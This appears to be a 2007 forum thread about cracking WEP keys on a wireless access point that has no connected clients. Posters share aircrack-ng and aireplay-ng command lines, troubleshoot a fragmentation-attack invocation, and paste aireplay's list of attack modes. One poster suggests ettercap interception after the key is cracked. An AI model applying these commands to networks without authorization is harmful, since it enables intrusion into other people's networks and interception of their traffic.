AP with no clients
mrhotdoguk
05-02-2007, 01:36 PM
Guys,
Is there a guide to crack WEP on an AP with no clients?
John.
theprez98
05-02-2007, 01:37 PM
> Guys,
> Is there a guide to crack WEP on an AP with no clients?
> John.
Yes. Search for clientless WEP cracking.
jaymill23
05-03-2007, 03:05 AM
tazforum.thetazzone.com/viewtopic.php?t=6611
My tutorial, hope it helps. Pass it on if you like it.
-=Xploitz=-
05-03-2007, 10:03 PM
> tazforum.thetazzone.com/viewtopic.php?t=6611
> My tutorial, hope it helps. Pass it on if you like it.
Nice tut... just read it... but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs
**note, if it's 128 bit, change 64 to 128**"
How do you know if it's 64 or 128 bit encryption? I assumed you couldn't tell.
theprez98
05-03-2007, 11:48 PM
> Nice tut... just read it... but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs
> **note, if it's 128 bit, change 64 to 128**"
> How do you know if it's 64 or 128 bit encryption? I assumed you couldn't tell.
If you don't know, leave out the -n option. It will default to 128 which is most likely.
jay2005
05-04-2007, 01:03 AM
When I input aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8 all I get is a bunch of options. Does this mean my card is not supported?
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
-g value : change ring buffer size (default: 8)
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
-o npckts : number of packets per burst (-1)
-q sec : seconds between keep-alives (-1)
-y prga : keystream for shared key auth
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes (Numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
jay2005
05-04-2007, 11:43 AM
This works great. I never put in ath1 after aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8.
Great tutorial, keep up the good work.
theprez98
05-04-2007, 01:37 PM
> When I input....all I get is a bunch of options...
In almost any program, this is a good indication that you gooned up something on the command line, as you already figured out.
jaymill23
05-04-2007, 11:25 PM
Thanks guys.
I have 2 ettercap tutorials on the site as well, that you could use after cracking the WEP.